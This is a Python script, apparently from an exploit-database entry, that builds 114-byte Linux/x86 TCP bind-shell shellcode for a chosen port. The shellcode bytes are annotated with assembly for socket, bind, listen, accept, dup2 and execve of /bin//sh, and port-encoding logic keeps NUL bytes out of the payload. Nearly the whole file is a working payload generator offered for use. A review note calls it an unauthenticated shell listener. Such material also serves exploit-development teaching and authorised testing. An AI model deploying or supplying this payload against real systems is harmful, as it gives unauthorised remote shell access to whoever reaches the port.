
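#!/usr/bin/python
# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
# Author: Bobby Cooke
# Date: 2020-01-29
# Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386
"""Generate a 114-byte Linux/x86 TCP bind shell for a user-chosen port.

The payload does socket() -> bind(INADDR_ANY:port) -> listen() -> accept()
-> dup2() x3 -> execve("/bin//sh"), all via int 0x80.  The two port bytes are
spliced into the `push word` that builds the sockaddr_in, and the result is
printed as a C or Python string literal.

NOTE(review): this is an *unauthenticated* bind shell listening on 0.0.0.0.
Anyone who can reach the port gets a shell with the privileges of the
exploited process.  Use only on systems you are authorised to test, and
tear the listener down as soon as you are done.

Works under both Python 2 and Python 3.
"""

import sys

try:
    _input = raw_input  # Python 2
except NameError:  # Python 3
    _input = input

# Part 1: socket() and the first half of bind(), up to (not including) the
# two port bytes that the generator appends.  32 bytes, NUL-free.
SC_PART1 = (
    # 1. sockfd = socketcall(SYS_SOCKET, [AF_INET, SOCK_STREAM, 0])
    b"\x31\xc0"              # xor eax, eax
    b"\xb0\x66"              # mov al, 0x66      ; syscall 102 = socketcall
    b"\x31\xdb"              # xor ebx, ebx
    b"\xb3\x01"              # mov bl, 0x1       ; SYS_SOCKET
    b"\x31\xc9"              # xor ecx, ecx
    b"\x51"                  # push ecx          ; protocol = 0
    b"\x53"                  # push ebx          ; type = SOCK_STREAM (1)
    b"\x6a\x02"              # push 0x2          ; domain = AF_INET
    b"\x89\xe1"              # mov ecx, esp      ; ecx -> argument array
    b"\xcd\x80"              # int 0x80
    b"\x96"                  # xchg esi, eax     ; esi = sockfd
    # 2. bind(sockfd, &sockaddr_in{AF_INET, htons(port), INADDR_ANY}, 16)
    b"\x31\xc0"              # xor eax, eax
    b"\xb0\x66"              # mov al, 0x66      ; socketcall
    b"\x31\xdb"              # xor ebx, ebx
    b"\xb3\x02"              # mov bl, 0x2       ; SYS_BIND (also == AF_INET, reused by "push bx")
    b"\x31\xd2"              # xor edx, edx      ; edx stays 0 until execve() at the end
    b"\x52"                  # push edx          ; sin_addr = INADDR_ANY
    b"\x66\x68"              # push word <port>  ; sin_port -- the generator appends the 2 bytes here
)

# Part 2: the rest of bind(), then listen/accept/dup2/execve.  80 bytes, NUL-free.
SC_PART2 = (
    b"\x66\x53"              # push bx           ; sin_family = AF_INET (bx == 2 from mov bl, 0x2)
    b"\x31\xc9"              # xor ecx, ecx
    b"\x89\xe1"              # mov ecx, esp      ; ecx -> sockaddr_in
    b"\x6a\x10"              # push 0x10         ; addrlen = 16
    b"\x51"                  # push ecx          ; &sockaddr_in
    b"\x56"                  # push esi          ; sockfd
    b"\x89\xe1"              # mov ecx, esp      ; ecx -> argument array
    b"\xcd\x80"              # int 0x80          ; bind()
    # 3. listen(sockfd, 0)
    b"\x31\xc0"              # xor eax, eax
    b"\xb0\x66"              # mov al, 0x66      ; socketcall
    b"\x31\xdb"              # xor ebx, ebx
    b"\xb3\x04"              # mov bl, 0x4       ; SYS_LISTEN
    b"\x31\xc9"              # xor ecx, ecx
    b"\x51"                  # push ecx          ; backlog = 0
    b"\x56"                  # push esi          ; sockfd
    b"\x89\xe1"              # mov ecx, esp
    b"\xcd\x80"              # int 0x80          ; listen()
    # 4. clientfd = accept(sockfd, NULL, NULL)
    b"\x31\xc0"              # xor eax, eax
    b"\xb0\x66"              # mov al, 0x66      ; socketcall
    b"\x31\xdb"              # xor ebx, ebx
    b"\xb3\x05"              # mov bl, 0x5       ; SYS_ACCEPT
    b"\x31\xc9"              # xor ecx, ecx
    b"\x51"                  # push ecx          ; addrlen = NULL
    b"\x51"                  # push ecx          ; addr = NULL
    b"\x56"                  # push esi          ; sockfd
    b"\x89\xe1"              # mov ecx, esp
    b"\xcd\x80"              # int 0x80          ; accept() blocks until a client connects
    b"\x93"                  # xchg ebx, eax     ; ebx = clientfd
    # 5. dup2(clientfd, 2); dup2(clientfd, 1); dup2(clientfd, 0)
    b"\x31\xc0"              # xor eax, eax
    b"\x31\xc9"              # xor ecx, ecx
    b"\xb1\x02"              # mov cl, 0x2       ; newfd, doubles as the loop counter
    b"\xb0\x3f"              # dup2_loop: mov al, 0x3f ; syscall 63 = dup2 (eax is clobbered by each call)
    b"\xcd\x80"              # int 0x80          ; dup2(ebx, ecx)
    b"\x49"                  # dec ecx
    b"\x79\xf9"              # jns dup2_loop     ; -7 bytes; exits once ecx wraps below 0
    # 6. execve("/bin//sh", NULL, NULL) -- edx is still 0 from the bind block
    b"\x52"                  # push edx          ; NUL terminator for the path
    b"\x68\x2f\x2f\x73\x68"  # push "//sh"
    b"\x68\x2f\x62\x69\x6e"  # push "/bin"
    b"\x89\xe3"              # mov ebx, esp      ; filename = "/bin//sh"
    b"\x89\xd1"              # mov ecx, edx      ; argv = NULL
    b"\xb0\x0b"              # mov al, 0xb       ; syscall 11 = execve
    b"\xcd\x80"              # int 0x80
)

# Total payload size; matches the advertised 114 bytes (32 + 2 + 80).
SHELLCODE_LEN = len(SC_PART1) + 2 + len(SC_PART2)


def port_bytes(port):
    """Return *port* as its two network-order (big-endian) bytes.

    `push word 0x5c11` is encoded as `66 68 11 5c`, so the bytes appended to
    SC_PART1 are simply the port in network byte order: 4444 -> 0x11 0x5c.

    Raises ValueError when the port is outside 1..65535 (it would not fit
    the `push word`), or when either byte is 0x00 -- a NUL would truncate
    the payload when it is copied around as a C string.  The original
    script only checked the low byte, so ports below 256 (e.g. 80) slipped
    through with a NUL high byte.
    """
    if not 1 <= port <= 65535:
        raise ValueError("TCP Port must be between 1 and 65535.")
    hi, lo = port >> 8, port & 0xff
    if hi == 0 or lo == 0:
        raise ValueError("Your TCP Port contains a Null 0x00.")
    return bytearray([hi, lo])


def build_shellcode(port):
    """Return the complete payload for *port* as a bytearray (114 bytes)."""
    return bytearray(SC_PART1) + port_bytes(port) + bytearray(SC_PART2)


def escape(data):
    """Render a byte sequence as a ``\\xNN``-escaped string ("\\x31\\xc0...")."""
    return "".join("\\x%02x" % b for b in bytearray(data))


def _chunks(escaped, width=48):
    """Split an escaped string into fixed-width pieces (48 chars = 12 bytes)."""
    return [escaped[i:i + width] for i in range(0, len(escaped), width)]


def format_python(escaped):
    """Format an escaped payload as `shellcode = "..."` / `shellcode += "..."` lines."""
    return 'shellcode = "' + '"\nshellcode += "'.join(_chunks(escaped)) + '"'


def format_c(escaped):
    """Format an escaped payload as a C `unsigned char shellcode[]` literal."""
    return ' unsigned char shellcode[] = \\\n"' + '"\n"'.join(_chunks(escaped)) + '";'


def main():
    """Prompt for a port and output format, then print the generated payload."""
    raw = _input("Enter TCP Port Number: ")
    try:
        port = int(raw)
    except ValueError:
        print("'%s' is not a valid TCP Port Number." % raw)
        print("Try again with a different Port Number.")
        sys.exit(1)

    try:
        encoded = port_bytes(port)
    except ValueError as exc:
        # Covers both out-of-range ports and ports with a 0x00 byte.
        print(str(exc))
        print("Try again with a different Port Number.")
        sys.exit(1)

    # Single-argument print() so the output is identical on Python 2 and 3.
    print("Your TCP Port in Hex is: " + escape(encoded))

    shellcode = escape(build_shellcode(port))

    print("Choose your shellcode export format.")
    export_format = _input("[1] = C Format\n[2] = Python Format\n[1]: ")
    if export_format == "2":
        print("[-----------------------Your-Shellcode------------------------]")
        print(format_python(shellcode))
    else:
        print("[----------------Your-Shellcode------------------]")
        print(format_c(shellcode))


if __name__ == "__main__":
    main()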